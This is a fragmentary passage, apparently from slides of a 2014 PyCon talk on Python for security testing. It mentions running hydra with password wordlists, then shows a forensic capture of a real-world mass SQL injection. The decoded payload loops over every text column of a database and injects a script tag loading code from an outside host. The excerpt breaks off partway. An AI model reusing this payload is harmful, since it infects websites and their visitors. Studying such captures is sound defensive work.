Security is only as strong as the weakest link. And the most frequent weakest link is the password.

Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 23 / 41
to log in using words in the dictionary. Python script to execute hydra for multiple dictionary files (wordlists).
attacked by SQL injection. Starting the forensics by capturing all network traffic.
: /transfertoasp.aspx
Value : id=143) declar @s varchar(4000) i set @s=cast(0x20736557420616e7369....
Frame : 52653
Reason : Possible use of SQL syntax in variable
VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  select c.TABLE_NAME, c.COLUMN_NAME
  from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
  where c.DATA_TYPE in ('nvarchar', 'varchar', 'ntext', 'text')
    and c.CHARACTER_MAXIMUM_LENGHT>30
    and t.table_name=c.table_name
    and t.table_type='BASE TABLE'
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="http://enswdzq112aazz.com/s1.php">